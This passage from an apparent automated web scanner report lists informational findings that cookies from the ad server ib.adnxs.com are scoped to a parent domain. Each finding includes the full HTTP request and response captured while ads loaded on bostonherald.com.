anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 22:27:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:27:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb502322=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:27:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb510504=5_[r^208WMuF4Lw)IE.8w)IgJ?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPwQ_cisQ0NJ6BWHfHSmrEELAQkNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQENgYBAgUCAAIAAAAAlCBOvgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296253632%29%3Buf%28%27r%27%2C+151403%2C+1296253632%29%3Bppv%2882%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2884%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2811%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2882%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2884%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2887%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3Bppv%28619%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3Bppv%28620%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3Bppv%28621%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; path=/; expires=Sat, 29-Jan-2011 22:27:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:27:12 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:27:12 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 22:27:12 GMT
Content-Length: 834

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-51832465_1296253632,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.69. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-83450342_1296254125%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_m-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D782666%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.ent_m%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.1877197385765612%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb510504=5_[r^208WMuF4Lw)IE.8w)IgJ?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQPwQ_cisQ0NJ6BWHfHSmrEELAQkNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQENgYBAgUCAAIAAAAAlCBOvgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296253632%29%3Buf%28%27r%27%2C+151403%2C+1296253632%29%3Bppv%2882%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2884%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2811%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2882%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2884%2C+%278850364985603407620%27%2C+1296253632%2C+1306621632%2C+2132%2C+24319%29%3Bppv%2887%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3Bppv%28619%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3Bppv%28620%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3Bppv%28621%2C+%278850364985603407620%27%2C+1296253632%2C+1296340032%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:42:45 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:45 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb510504=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:45 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb307194=5_[r^208WMM2x@N!@@-#i?ZLM?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP-_d-QzLH-9yBWHfHSmrEEKVcENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEpQQBAgUCAAIAAAAALyTsvgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265365%29%3Buf%28%27r%27%2C+116344%2C+1296265365%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:45 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:45 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:45 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 29 Jan 2011 01:42:45 GMT
Content-Length: 833

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-83450342_1296254125,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.70. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-51832465_1296253632%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D302941%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.ent_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.9211412204895169%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb502322=5_[r^208WMuF4Lw)IE.8#`^VR?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP6BgySx3_8JEBWHfHSmrEELJQUNNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEnQMBAgUCAAIAAAAAZSKqQQAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296253385%29%3Buf%28%27r%27%2C+151403%2C+1296253385%29%3Bppv%2882%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2884%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2811%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2882%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2884%2C+%274954803427378552992%27%2C+1296253385%2C+1306621385%2C+2132%2C+24319%29%3Bppv%2887%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3Bppv%28619%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3Bppv%28620%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3Bppv%28621%2C+%274954803427378552992%27%2C+1296253385%2C+1296339785%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:42:29 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:29 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb502322=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:42:29 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb309158=5_[r^208WMM2x@N!@@-#d2Qg=?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP6x8iUTubwtkBWHfHSmrEEKFcENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEkgQBAgUCAAIAAAAAsSLfRQAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265349%29%3Buf%28%27r%27%2C+116344%2C+1296265349%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:42:29 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:42:29 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Fri, 29-Apr-2011 01:42:29 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sat, 29 Jan 2011 01:42:29 GMT
Content-Length: 833

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-51832465_1296253632,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.71. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-84139438_1296253138%2C11d765b6a10b1b3%2Cent%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_l-bk.rdst1-mm.aa1-mm.ac1-mm.ad1-mm.ae5-mm.af5-mm.ak1-mm.ap5-mm.aq1-mm.ar1-mm.au1-mm.da1-mm.db2-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D47567%3Bcontx%3Dent%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.rdst7%3Bbtg%3Dcm.rdst8%3Bbtg%3Dcm.polit_l%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dcm.ent_l%3Bbtg%3Dbk.rdst1%3Bbtg%3Dmm.aa1%3Bbtg%3Dmm.ac1%3Bbtg%3Dmm.ad1%3Bbtg%3Dmm.ae5%3Bbtg%3Dmm.af5%3Bbtg%3Dmm.ak1%3Bbtg%3Dmm.ap5%3Bbtg%3Dmm.aq1%3Bbtg%3Dmm.ar1%3Bbtg%3Dmm.au1%3Bbtg%3Dmm.da1%3Bbtg%3Dmm.db2%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.7543001882731915%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=EAAYAA..; acb458625=5_[r^208WMuF4Lw)IE.8*M4Bc?enc=0GT_PA0Y0D_cGzLUF_jMPwAAAKCZmQFA3Bsy1Bf4zD_QZP88DRjQP8BW6sqWS4UpBWHfHSmrEELbP0NNAAAAACQ9AwA3AQAAZAAAAAIAAABrTwIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEkgQBAgUCAAIAAAAAUyJEQAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+27%2C+1296252891%29%3Buf%28%27r%27%2C+151403%2C+1296252891%29%3Bppv%2882%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2884%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2811%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2882%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2884%2C+%272991880638479095488%27%2C+1296252891%2C+1306620891%2C+2132%2C+24319%29%3Bppv%2887%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3Bppv%28619%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3Bppv%28620%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3Bppv%28621%2C+%272991880638479095488%27%2C+1296252891%2C+1296339291%2C+2132%2C+24319%29%3B&cnd=!NRvbFwjUEBDrngkYwI8BIP-9ASjUCTEEyEQODRjQP0ITCAAQABgAIAEo_v__________AUIMCFIQuMMIGAIgAygAQgwIVBDxhhEYBSADKABIAVAAWKoDYABoZA..&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E2132; uuid2=4760492999213801733; anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`)

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 22:18:58 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:18:58 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb458625=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=EAAYAA..; path=/; expires=Thu, 28-Apr-2011 22:18:58 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb322141=5_[r^208WMZzhw!0nf8M'VILZ?enc=AAAAAAAA4D_NzMzMzMzcPwAAAKCZmQFAzczMzMzM3D8AAAAAAADgP8QzzGlufgMIBWHfHSmrEELSQENNAAAAACQ9AwA3AQAAbAEAAAIAAACDbAIA_14AAAEAAABVU0QAVVNEACwB-gCqAdQE_AUBAgUCAAIAAAAAUCD5SgAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+8044%2C+1296253138%29%3Buf%28%27c%27%2C+43438%2C+1296253138%29%3Buf%28%27g%27%2C+18638%2C+1296253138%29%3Buf%28%27r%27%2C+158851%2C+1296253138%29%3Bppv%288484%2C+%27577444189920048068%27%2C+1296253138%2C+1296857938%2C+43438%2C+24319%29%3Bppv%288484%2C+%27577444189920048068%27%2C+1296253138%2C+1296857938%2C+43438%2C+24319%29%3B&cnd=!wRdxQwiu0wIQg9kJGAAg_70BKNQJMQAAAAAAAOA_QhMIABAAGAAgASj-__________8BQgsIpEIQABgAIAMoAUILCKRCEAAYACACKAFIAVAAWKoDYABo7AI.; path=/; expires=Sat, 29-Jan-2011 22:18:58 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 22:18:58 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5CDP5IdobQp=.7Y_US^K!(%(.4I+qQ$J0wve^Z/+*WcJfY')DN?BP8V*e9J'(fppQF7.Ug94H61YX5)g-XJnnLU`*:U<**L!@#Tu$IiClP@D=K!yv4_t0zHjP3qjZcH?l%e8u%*N#j@$bgWNz$Qg:L33HC:A.$a#18TDFhxKpZKc?9$hZmYhjrMQC?'I_SNr@`); path=/; expires=Thu, 28-Apr-2011 22:18:58 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Fri, 28 Jan 2011 22:18:58 GMT
Content-Length: 833

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.rev_bostonherald/;net=cm;u=,cm-84139438_1296253138,11d765b6a10b1b3,ent,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.
...[SNIP]...

10.72. http://ib.adnxs.com/ptj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

